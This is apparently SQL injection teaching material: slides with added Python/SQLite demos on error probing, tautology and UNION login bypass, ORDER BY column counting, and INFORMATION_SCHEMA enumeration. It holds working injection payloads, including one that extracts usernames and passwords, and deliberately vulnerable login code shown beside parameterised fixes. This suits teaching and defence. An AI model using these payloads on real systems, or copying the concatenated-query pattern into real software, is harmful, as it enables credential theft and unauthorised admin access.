
























DATABASE

TABLE: users
    ID  username  password  is_admin
    1   bob       p4ssw0rd  true
    2   alice     s3cur3    false

Normal login flow

USER -> SERVER
    POST username=alice&password=s3cur3

SERVER -> DATABASE
    Query template: SELECT password, is_admin FROM users WHERE username = '?';
    Query sent:     SELECT password, is_admin FROM users WHERE username = 'alice';

DATABASE -> SERVER
    password = s3cur3, is_admin = false

SERVER checks the credentials
    Password supplied: s3cur3
    Password in DB:    s3cur3
    Login successful, no admin privileges
Probing for errors

- Probe forms with characters until the SQL syntax breaks; typically single or double quotes.
- e.g. sending a parameter of ' breaks out of the username parameter (odd number of quotes):

    Mysql2::Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' AND password=''' at line 1: SELECT * FROM users WHERE username=''' AND password=''

- From the error we can infer the query was
    SELECT * FROM users WHERE username=''' AND password='[PASSWORD]'
  or, in general,
    SELECT * FROM users WHERE username='[USERNAME]' AND password='[PASSWORD]';
- Must hide errors from the adversary!

Code example (PHP)

    // Insecure code. Never use!
    // The request values are pasted straight into the SQL text, so a quote in the
    // input ends the string literal and whatever follows is parsed as SQL.
    $sqlStatement = "SELECT * FROM users WHERE username='" . $_GET['username'] . "' AND password='" . $_GET['password'] . "';";
    mysql_query($sqlStatement);

Normal input (username=foo, password=bar):
    SELECT * FROM users WHERE username='foo' AND password='bar';

Injected input (username=foo' or '1'='1, password=bar' or '1'='1):
    SELECT * FROM users WHERE username='foo' or '1'='1' AND password='bar' or '1'='1';
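The login flow and the PHP snippet above both build the SQL text by string concatenation. The following Python/SQLite program is an added example, not code from the slides, that reproduces that pattern next to a parameterised version, using the slide's users table and the slide's own inputs: a lone quote (the error probe) and the foo' or '1'='1 tautology. SQLite is assumed instead of MySQL, so the placeholder is ? and the error text differs from the Mysql2::Error shown; the function names and the {"ok": ...} return shape are the example's own.

```python
import sqlite3


def make_db():
    """Constructed in-memory copy of the slide's users table (is_admin stored as 1/0)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT, is_admin INTEGER)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)",
                     [(1, "bob", "p4ssw0rd", 1), (2, "alice", "s3cur3", 0)])
    return conn


def login_vulnerable(conn, username, password):
    """Same construction as the slide's PHP: the request values are pasted into the SQL
    text, so a quote in the input ends the string literal and the rest becomes syntax.
    On a parse error it hands back the database message plus the statement, which is
    what the Mysql2::Error on the slide leaked to the user."""
    sql = ("SELECT * FROM users WHERE username='" + username
           + "' AND password='" + password + "';")
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.Error as e:
        return {"ok": False, "error": f"{e}: {sql}"}
    if rows:
        # First matching row wins; with the tautology every row matches and bob (admin) is first.
        return {"ok": True, "is_admin": bool(rows[0][3])}
    return {"ok": False}


def login_safe(conn, username, password):
    """Parameterised query: the driver sends the values separately from the SQL text, so
    quotes, OR and UNION in the input stay inside the compared string. A database error
    is written to the server log only; the caller sees a generic failure."""
    try:
        rows = conn.execute(
            "SELECT * FROM users WHERE username=? AND password=?",
            (username, password),
        ).fetchall()
    except sqlite3.Error as e:
        print(f"[server log only] database error: {e}")
        return {"ok": False}
    if rows:
        return {"ok": True, "is_admin": bool(rows[0][3])}
    return {"ok": False}


if __name__ == "__main__":
    conn = make_db()
    probe = "'"                          # the slide's error probe
    user_taut, pass_taut = "foo' or '1'='1", "bar' or '1'='1"   # the slide's injected values
    print("vulnerable, probe:    ", login_vulnerable(conn, probe, ""))
    print("vulnerable, tautology:", login_vulnerable(conn, user_taut, pass_taut))
    print("safe, probe:          ", login_safe(conn, probe, ""))
    print("safe, tautology:      ", login_safe(conn, user_taut, pass_taut))
    print("safe, alice:          ", login_safe(conn, "alice", "s3cur3"))
```

The vulnerable function returns the full statement in its error, which is the information the slide says must be hidden; the safe function keeps that text in the server log and only ever answers "login failed" to the client.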
UNION

UNION merges two tables together.
Tables must have the same number of columns to merge.

TABLE: users
    ID  username  password  is_admin
    1   bob       p4ssw0rd  true
    2   alice     s3cur3    false

SELECT * FROM users ... UNION SELECT 1,1,1

  With three columns selected, the row (1, 1, 1) merges in:
    ID  username  password
    1   bob       p4ssw0rd
    2   alice     s3cur3
    1   1         1

  Against all four columns the merged row has no value for is_admin:
    ID  username  password  is_admin
    1   bob       p4ssw0rd  true
    2   alice     s3cur3    false
    1   1         1         null

  With is_admin stored as 1/0, UNION SELECT 1,1,1,1 merges in a row that looks like an admin:
    ID  username  password  is_admin
    1   bob       p4ssw0rd  1
    2   alice     s3cur3    0
    1   1         1         1

Injected login

USER -> SERVER
    POST username=1' UNION SELECT 1,1,1,1 # &password=1

SERVER -> DATABASE
    SELECT password, is_admin FROM users WHERE username = '1' UNION SELECT 1,1,1,1 # ' ;
    (the # starts a MySQL comment, so the server's trailing quote is ignored)

DATABASE -> SERVER
    password = 1, is_admin = 1

SERVER checks the credentials
    Password supplied: 1
    Password in DB:    1
    Login successful, admin privileges
ORDER BY

ORDER BY sorts rows based on column number.

TABLE: users
    ID  username  password  is_admin
    1   bob       p4ssw0rd  true
    2   alice     s3cur3    false

Can be used to determine the number of columns a query returns:
'ORDER BY x' works only if x is less than or equal to the number of columns in the result; a larger x is an error.
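The UNION and ORDER BY slides above both hinge on column counts: a UNION only parses when both sides select the same number of columns, and ORDER BY n only parses when n is at most the number of selected columns. The following Python/SQLite program is an added example, not code from the slides, that shows both behaviours on the slide's users table next to the fixes. SQLite is assumed, so the injected comment is -- (as on the INFORMATION_SCHEMA slide) rather than MySQL's #, the error texts are SQLite's, and the injected UNION keeps two columns to match the slide's two-column SELECT (the four-column variant is included to show the error a mismatch produces). Bound parameters neutralise the UNION; ORDER BY takes an identifier, which cannot be bound, so the sort column is checked against an allow-list instead. Function names and ALLOWED_SORT_COLUMNS are the example's own.

```python
import sqlite3


def make_db():
    """Constructed in-memory copy of the slide's users table (is_admin stored as 1/0)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT, is_admin INTEGER)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)",
                     [(1, "bob", "p4ssw0rd", 1), (2, "alice", "s3cur3", 0)])
    return conn


def lookup_vulnerable(conn, username):
    """The slide's lookup with the username concatenated in. Returns the
    (password, is_admin) rows, or the database's error text when the statement
    no longer parses (for instance a UNION with the wrong column count)."""
    sql = "SELECT password, is_admin FROM users WHERE username = '" + username + "'"
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error as e:
        return str(e)


def lookup_safe(conn, username):
    """Same lookup with a bound parameter: the whole input is compared as one username."""
    return conn.execute(
        "SELECT password, is_admin FROM users WHERE username = ?", (username,)
    ).fetchall()


def list_usernames_vulnerable(conn, sort_by):
    """ORDER BY built from the request value. An out-of-range column number is an
    error, which is the behaviour the slide uses to count a query's columns."""
    sql = "SELECT id, username FROM users ORDER BY " + sort_by
    try:
        return [row[1] for row in conn.execute(sql)]
    except sqlite3.Error as e:
        return str(e)


# Identifiers cannot be bound as parameters, so the sort column is allow-listed instead.
ALLOWED_SORT_COLUMNS = {"id", "username"}


def list_usernames_safe(conn, sort_by):
    """Only a column name from the allow-list ever reaches the SQL text."""
    if sort_by not in ALLOWED_SORT_COLUMNS:
        raise ValueError(f"unsupported sort column: {sort_by!r}")
    return [row[1] for row in conn.execute(f"SELECT id, username FROM users ORDER BY {sort_by}")]


if __name__ == "__main__":
    conn = make_db()
    print("2-column UNION, vulnerable:", lookup_vulnerable(conn, "1' UNION SELECT 1,1 --"))
    print("4-column UNION, vulnerable:", lookup_vulnerable(conn, "1' UNION SELECT 1,1,1,1 --"))
    print("2-column UNION, safe:      ", lookup_safe(conn, "1' UNION SELECT 1,1 --"))
    print("ORDER BY 2, vulnerable:    ", list_usernames_vulnerable(conn, "2"))
    print("ORDER BY 5, vulnerable:    ", list_usernames_vulnerable(conn, "5"))
    print("ORDER BY username, safe:   ", list_usernames_safe(conn, "username"))
```

The two-column UNION returns the attacker-chosen row (1, 1) as "password" and "is_admin", exactly the outcome of the injected login on the slide, while the four-column variant fails at parse time; the parameterised lookup returns no row for either input because the whole string is simply a username that does not exist.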
INFORMATION_SCHEMA

- Special MySQL schema whose tables describe every table and column in the database.
- INFORMATION_SCHEMA.TABLES holds the names of tables in "table_name".
- INFORMATION_SCHEMA.COLUMNS holds data about table columns, with the names in "column_name".
- Helpful in injection attacks.

Example: suppose this URL is injectable: www.injectable.com/article.php?articleID=
Assume the query takes 5 as input and returns 3 columns.

1. Find the name of the table you want:
    5' UNION SELECT table_name,table_name,table_name FROM INFORMATION_SCHEMA.TABLES --
2. If the table of interest is "UserAccounts", get its columns:
    5' UNION SELECT column_name,column_name,column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='UserAccounts' --
3. If the column names include username and password:
    5' UNION SELECT username,password,password FROM UserAccounts --